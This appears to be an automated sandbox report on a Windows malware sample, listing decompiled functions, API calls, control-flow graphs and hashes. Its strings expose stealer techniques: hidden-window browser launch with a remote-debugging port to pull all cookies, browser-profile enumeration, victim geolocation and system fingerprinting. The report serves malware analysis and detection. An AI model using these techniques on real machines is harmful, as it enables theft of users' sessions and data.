                                                                                                                                                                                                                                                                                                                              control_flow_graph 1646 40428c-4042ad connect 1647 4043e1-4043e5 1646->1647 1648 4042b3-4042b6 1646->1648 1649 4043e7-4043f5 WSAGetLastError 1647->1649 1650 40445f 1647->1650 1651 4043da-4043dc 1648->1651 1652 4042bc-4042bf 1648->1652 1649->1650 1656 4043f7-4043fa 1649->1656 1653 404461-404465 1650->1653 1651->1653 1654 4042c1-4042e8 call 404cbf call 401f66 call 41a696 1652->1654 1655 4042eb-4042f5 call 420161 1652->1655 1654->1655 1668 404306-404313 call 420383 1655->1668 1669 4042f7-404301 1655->1669 1658 404439-40443e 1656->1658 1659 4043fc-404437 call 41bc86 call 404c9e call 401f66 call 41a696 call 401eea 1656->1659 1664 404443-40445c call 401f66 * 2 call 41a696 1658->1664 1659->1650 1664->1650 1681 404315-404338 call 401f66 * 2 call 41a696 1668->1681 1682 40434c-404357 call 420f44 1668->1682 1669->1664 1707 40433b-404347 call 4201a1 1681->1707 1693 404389-404396 call 4202fa 1682->1693 1694 404359-404387 call 401f66 * 2 call 41a696 call 4205a2 1682->1694 1704 404398-4043bb call 401f66 * 2 call 41a696 1693->1704 1705 4043be-4043d7 CreateEventW * 2 1693->1705 1694->1707 1704->1705 1705->1651 1707->1650
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • connect.WS2_32(?,007E5980,00000010), ref: 004042A5
                                                                                                                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                                                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                                                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                                                                                                                                                                                                                                              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                                                                                                                                                                                                                                              • API String ID: 994465650-2151626615
                                                                                                                                                                                                                                                                                                                              • Opcode ID: a4e18afe933675d0407cf742d47b00e7b2d874d83016cd3d108ad56ba9ad3496
                                                                                                                                                                                                                                                                                                                              • Instruction ID: feeaa4dc0a5480c3be004408dd81f6e2390fe6c9429734df96c13844dfc6b1ca
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a4e18afe933675d0407cf742d47b00e7b2d874d83016cd3d108ad56ba9ad3496
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E4116B1B002026BCB04B77A8C4B66E7A55AB81354B40016FE901676D3FE79AD6087DF
                                                                                                                                                                                                                                                                                                                              Function 004047EB Relevance: 18.1, APIs: 12, Instructions: 66synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                                                                                                                                                                                                                                                                              • closesocket.WS2_32(000000FF), ref: 0040481F
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404856
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00404867
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040486E
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404880
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404885
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040488A
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404895
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 0040489A
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3658366068-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6857b948c75ecf5e4d11b49f17ebd09eceef1c2fbc6fc14a1e153603fddcf20a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8839b1e3ce5f0ca92630ed3addc8668ddbef0a342dde1beb3290f4e349eef524
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A212C71144B149FDB216B26EC45A27BBE1EF40325F104A7EF2E212AF1CB76E851DB48
                                                                                                                                                                                                                                                                                                                              Function 0040C89E Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                                                                                              control_flow_graph 1738 40c89e-40c8c3 call 401e52 1741 40c8c9 1738->1741 1742 40c9ed-40ca85 call 401e07 GetLongPathNameW call 403b40 * 2 call 40cc37 call 402860 * 2 call 401e13 * 5 1738->1742 1743 40c8d0-40c8d5 1741->1743 1744 40c9c2-40c9c7 1741->1744 1745 40c905-40c90a 1741->1745 1746 40c9d8 1741->1746 1747 40c9c9-40c9ce call 43ac1f 1741->1747 1748 40c8da-40c8e8 call 41a75b call 401e18 1741->1748 1749 40c8fb-40c900 1741->1749 1750 40c9bb-40c9c0 1741->1750 1751 40c90f-40c916 call 41b16b 1741->1751 1753 40c9dd-40c9e2 call 43ac1f 1743->1753 1744->1753 1745->1753 1746->1753 1759 40c9d3-40c9d6 1747->1759 1771 40c8ed 1748->1771 1749->1753 1750->1753 1763 40c918-40c968 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1751->1763 1764 40c96a-40c9b6 call 403b40 call 43ac1f call 403b40 call 402860 call 401e18 call 401e13 * 2 1751->1764 1765 40c9e3-40c9e8 call 4082d7 1753->1765 1759->1746 1759->1765 1777 40c8f1-40c8f6 call 401e13 1763->1777 1764->1771 1765->1742 1771->1777 1777->1742
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LongNamePath
                                                                                                                                                                                                                                                                                                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                                                                                                                                                                                                                                              • API String ID: 82841172-425784914
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b30252eb1cb3c0481423ff18967e2180ec7fecba35bd7cbbc495df7c3b0763b3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a37aa742da7f535015bd00beacd4484d13b2c9c5bc690283ee024c69455bfc47
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b30252eb1cb3c0481423ff18967e2180ec7fecba35bd7cbbc495df7c3b0763b3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68413A721442009AC214F721DD97DAFB7A4AE90759F10063FB546720E2FE7CAA49C69F
                                                                                                                                                                                                                                                                                                                              Function 100067D0 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 277COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006845
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006904
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?), ref: 10006A19
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: Default$Default$Profile $User Data\Default$User Data\Profile $\Default
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-1565956251
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c48fbd17205d7ba1619b983e1e753baa49308f99db8d788a119820742a600395
                                                                                                                                                                                                                                                                                                                              • Instruction ID: a37d211fa08ad78f2eb18696fba1f90168a005bfae744a9f2f60b4d9e59cb154
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c48fbd17205d7ba1619b983e1e753baa49308f99db8d788a119820742a600395
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82A16DB4D00248DEEF01DBA4DC85BEEBBBAFF48344F208019E415E7255DB34AA45CBA1
                                                                                                                                                                                                                                                                                                                              Function 100025A0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • localhost, xrefs: 1000296F
                                                                                                                                                                                                                                                                                                                              • D, xrefs: 1000263C
                                                                                                                                                                                                                                                                                                                              • {"id":1,"method":"Network.getAllCookies","params":{}}, xrefs: 10002962
                                                                                                                                                                                                                                                                                                                              • --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory=", xrefs: 10002737
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="$D$localhost${"id":1,"method":"Network.getAllCookies","params":{}}
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-36197314
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 40ccbdec88be9962e706eaa5533df9936f7b939966369cc920347d0ed5184c3d
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2d3aa22fbaa631a7903eb1ae554ed7ed7e75fe155870fb2b8e401e179505af5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8515C74D05258EEEB61CBA4CC85BDEBBB4EF14344F208199E40DA3295EB746A88CF51
                                                                                                                                                                                                                                                                                                                              Function 100085D8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71networkwindowCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • getaddrinfo.WS2_32(?,00000010,?,?), ref: 100085F0
                                                                                                                                                                                                                                                                                                                              • FormatMessageA.KERNEL32(000012FF,00000000,00000000,00000400,1002C4F0,00000400,00000000,?,00000010,?,?), ref: 10008613
                                                                                                                                                                                                                                                                                                                              • socket.WS2_32(?,?,?), ref: 10008659
                                                                                                                                                                                                                                                                                                                              • connect.WS2_32(00000000,?,?), ref: 1000866D
                                                                                                                                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 10008679
                                                                                                                                                                                                                                                                                                                              • FreeAddrInfoW.WS2_32(?), ref: 10008689
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: AddrFormatFreeInfoMessageclosesocketconnectgetaddrinfosocket
                                                                                                                                                                                                                                                                                                                              • String ID: getaddrinfo: %s
                                                                                                                                                                                                                                                                                                                              • API String ID: 1733616599-4118680637
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ba985bc0003f028ac4b4e599035e3f0603eaa92aeb31a9206ee88384ba24f580
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2c738af1012253b4d1f1cfc086a1553b903a96f3a37eb19fe2757ed9f79e3473
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E411E432A01614BBFB20DBA09C45F9E73A9FB44764F210619FB69A31D0C732BA168795
                                                                                                                                                                                                                                                                                                                              Function 0041A473 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B17C
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041B16B: IsWow64Process.KERNEL32(00000000,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B183
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                                                                                                                                                              • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4E9
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                                                                                                                                                                                                                                                                              • String ID: (32 bit)$ (64 bit)$0JG$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                                                                                                              • API String ID: 782494840-3211212173
                                                                                                                                                                                                                                                                                                                              • Opcode ID: c04da24c9247c8294ecfa71116a75544abb23810716f5a1478d6322274e37ad3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: ceb3f8158c83cee62a9ab3acf094014ca2543c25b31c887bfc35cbf025930a6e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c04da24c9247c8294ecfa71116a75544abb23810716f5a1478d6322274e37ad3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F611CAA050020566C704B765DC9BDBF765ADB90304F40453FB506E31D2EB6C8E8583EE
                                                                                                                                                                                                                                                                                                                              Function 10007890 Relevance: 12.2, APIs: 8, Instructions: 154processthreadCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 100078AF
                                                                                                                                                                                                                                                                                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 100078D1
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 100078DC
                                                                                                                                                                                                                                                                                                                              • FindWindowExA.USER32(00000000,00000000,00000000,00000000), ref: 100079D8
                                                                                                                                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 100079EC
                                                                                                                                                                                                                                                                                                                              • ShowWindow.USER32(00000000,00000000), ref: 100079FA
                                                                                                                                                                                                                                                                                                                              • Process32NextW.KERNEL32(?,0000022C), ref: 10007A1B
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 10007A2D
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Window$CloseHandleProcess32$CreateFindFirstNextProcessShowSnapshotThreadToolhelp32
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 3779799082-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 28168c6b715034a36be03b313f43d975925a8318cec7ebb959fea568e5b33c31
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 2a0021c97947e2911aefd651af9cf86dd4725709f7f3ac61b73b067665f658f9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 28168c6b715034a36be03b313f43d975925a8318cec7ebb959fea568e5b33c31
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6951A432E0022A9BEB21CFA4CC84BAEB7B5FF45794F214259DD19B7284D7345E42CB91
                                                                                                                                                                                                                                                                                                                              Function 0041A52B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A54E
                                                                                                                                                                                                                                                                                                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A564
                                                                                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A57D
                                                                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C3
                                                                                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0041A5C6
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • http://geoplugin.net/json.gp, xrefs: 0041A55E
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleOpen$FileRead
